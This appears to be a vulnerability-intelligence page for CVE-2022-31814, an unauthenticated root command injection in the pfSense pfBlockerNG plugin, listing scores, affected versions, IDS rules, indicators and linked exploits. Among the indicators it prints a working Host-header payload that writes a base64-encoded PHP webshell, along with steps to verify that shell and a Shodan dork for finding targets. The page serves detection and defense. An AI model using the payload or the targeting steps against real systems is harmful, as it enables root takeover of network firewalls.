CVE-2022-31814
published 2022-09-05CVE-2022-31814: pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
86.45%
99.7th percentile
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netgate | pfblockerng | <= 2.1.4_26 | — |
| pfsense | pfblockerng | < 2.1.4_27 | 2.1.4_27 |
Detection & IOCsextracted from sources · hover to see the quote
command' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '↗
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pfblockerng/www/index.php"; fast_pattern; http.host; content:"|2a 3b|"; startswith; reference:url,www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/; reference:cve,2022-31814; classtype:attempted-admin; sid:2044629; rev:1; metadata:affected_product IoT, attack_target Networking_Equipment, created_at 2023_03_15, cve CVE_2022_31814, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_15, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|2a 3b|
- →Exploit sends a GET request to /pfblockerng/www/index.php with shell metacharacters (e.g., ' *; ... ;') injected into the HTTP Host header to achieve unauthenticated RCE as root. ↗
- →The Snort/ET rule detects the attack by matching GET requests to /pfblockerng/www/index.php where the HTTP Host header starts with bytes 0x2a 0x3b (i.e., '* ;'), indicating shell metacharacter injection.
- →After successful exploitation, a PHP webshell is dropped at /usr/local/www/system_advanced_control.php and accessed via GET parameter 'c' for command execution. Presence of this file on a pfSense host is a strong indicator of compromise. ↗
- →Successful shell upload can be confirmed by checking for 'uid=0(root) gid=0(wheel)' in the response to /system_advanced_control.php?c=id. ↗
- →The Nuclei template confirms exploitation by checking that the initial response body to /pfblockerng/www/index.php contains 'GIF', and then verifying a DNS interaction via interactsh, indicating OOB callback from the injected Host header command.
- →Shodan dork can be used to identify exposed pfSense instances potentially running pfBlockerNG: search for http.title:"pfSense - Login" with Server: nginx and Set-Cookie: PHPSESSID=. ↗
- ·Only pfBlockerNG versions 2.1.4_26 and below are affected; version 3.x is explicitly unaffected. Ensure detection rules are scoped accordingly to avoid false positives on patched or v3.x installations. ↗
- ·pfBlockerNG is not installed by default on pfSense; the attack surface only exists on systems where the plugin has been explicitly installed. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-crg2-7qxv-74jh: pfSense pfBlockerNG through 2
ghsa_unreviewed·2022-12-20·CVSS 9.8
CVE-2022-40624 [CRITICAL] CWE-78 GHSA-crg2-7qxv-74jh: pfSense pfBlockerNG through 2
pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.
GHSA
GHSA-hr8v-98c3-7p3x: pfSense pfBlockerNG through 2
ghsa_unreviewed·2022-09-06
CVE-2022-31814 [CRITICAL] CWE-78 GHSA-hr8v-98c3-7p3x: pfSense pfBlockerNG through 2
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
VulnCheck
netgate pfblockerng Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-31814 [CRITICAL] netgate pfblockerng Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
netgate pfblockerng Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
Affected: netgate pfblockerng
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2022-31814&date=2025-10-17; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2022-31814&date=2025-10-18; https://api.vulncheck.com/
Suricata
ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)
suricata·2023-03-15·CVSS 9.8
CVE-2022-31814 [CRITICAL] ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)
ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pfblockerng/www/index.php"; fast_pattern; http.host; content:"|2a 3b|"; startswith; reference:url,www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/; reference:cve,2022-31814; classtype:attempted-admin; sid:2044629; rev:1; metadata:affected_product IoT, attack_target Networking_Equipment, created_at 2023_03_15, cve CVE_2022_31814, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag De
Exploit-DB
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
exploitdb·2023-02-20·CVSS 9.8
CVE-2022-31814 [CRITICAL] pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
---
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureReques
Metasploit
pfSense plugin pfBlockerNG unauthenticated RCE as root
metasploit
pfSense plugin pfBlockerNG unauthenticated RCE as root
pfSense plugin pfBlockerNG unauthenticated RCE as root
pfBlockerNG is a popular pfSense plugin that is not installed by default. It's generally used to block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
Nuclei
pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
nuclei·CVSS 9.8
CVE-2022-31814 [CRITICAL] pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
pfSense pfBlockerNG =2.1..4_27) to mitigate this vulnerability.
reference:
- https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
- https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
- https://github.com/EvergreenCartoons/SenselessViolence
- https://nvd.nist.gov/vuln/detail/CVE-2022-31814
- http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31814
cwe-id: CWE-78
epss-score: 0.9436
epss-percentile: 0.99962
cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
metadata:
verified: true
max-request: 2
vendor: netgate
product: pfblockerng
framework: pfsense
tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oas
No writeups or analysis indexed.
http://packetstormsecurity.com/files/168743/pfSense-pfBlockerNG-2.1.4_26-Shell-Upload.htmlhttp://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.htmlhttps://docs.netgate.com/pfsense/en/latest/packages/pfblocker.htmlhttps://github.com/pfsense/FreeBSD-ports/pull/1169https://github.com/pfsense/FreeBSD-ports/pull/1169/commits/071bdcf2d918c3e51cde11cf81fbd9b6f0379d7ehttps://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/http://packetstormsecurity.com/files/168743/pfSense-pfBlockerNG-2.1.4_26-Shell-Upload.htmlhttp://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.htmlhttps://docs.netgate.com/pfsense/en/latest/packages/pfblocker.htmlhttps://github.com/pfsense/FreeBSD-ports/pull/1169https://github.com/pfsense/FreeBSD-ports/pull/1169/commits/071bdcf2d918c3e51cde11cf81fbd9b6f0379d7ehttps://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
2022-09-05
Published
Exploited in the wild